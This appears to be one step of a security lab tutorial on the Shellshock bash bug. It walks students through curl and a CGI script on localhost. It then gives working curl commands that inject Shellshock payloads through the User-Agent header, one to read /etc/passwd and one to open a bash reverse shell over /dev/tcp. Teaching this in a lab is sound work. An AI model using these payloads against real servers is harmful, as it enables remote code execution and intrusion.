Lab: Shellshock curl

The goal of this step is to understand curl.

Step: 7

Another utility that we need to discuss is curl
- This is a generic tool for transferring data from a server.
- It understands many different protocols.
- But the one we care about is http
First look at /usr/lib/cgi-bin/test.cgi
- Note that this is just a bash program.
- And that it is using the faulty shell
- And that it does not do any input at all.
You can run this from a browser: http://localhost/cgi-bin/test.cgi
Curl is "a tool for transferring data from or to a server"
- It supports many different protocols.
- But in this case we are interested in http
curl http://localhost/cgi-bin/test.cgi
curl supports many different command line flags.
- -v invokes verbose mode.
When the program is run, it is run in a subshell.
Let's look a the environment of that subshell
- edit /usr/lib/cgi-bin/test.cgi
- Add printenv
Fetch this web pages with both curl and the browser.
- Note that the variable HTTP_USER_AGENT is set as an environment variable.
- This allows you to customize your output
- Try adding
```
echo ${HTTP_USER_AGENT}

echo
if [ ${HTTP_USER_AGENT}=="curl/7.47.0" ]; then
    echo "Hello Curl User"
else
    echo "Be cool, use curl"
fi 
```
From this we can determine that when apache forks a new process to run the cgi program
- It sets the environment variable HTTP_USER_AGENT.
It turns out that curl lets us control the user agent
- -A agent_string
Try curl -v -A "Not Curl" http://localhost/cgi-bin/test.cgi
Try curl -v http://localhost/cgi-bin/test.cgi -A "() { echo hello;}; /bin/cat /etc/passwd
We need to add just a little to this to make remote commands work.
We need to trick the web server into thinking it is delivering a web pages.
To do this look at the cgi-bin script
- ```
echo Content-type: text/plain
echo
echo 
# bash code goes here 
```
- This is the form of all cgi-bin programs
Try curl -v http://localhost/cgi-bin/test.cgi -A "() { echo hello;}; echo Content-type: plain/text; echo; echo; /bin/cat /etc/passwd
Can you use this, and your knowledge of the shell-shock bug to start a reverse server?
- Remember, we are not returning a value in the web page, so we don't really need the extra echos.
- curl -v http://localhost/cgi-bin/test.cgi -A "() { echo hello;}; /bin/bash -i > /dev/tcp/localhost/9090 0<&1 2>&1"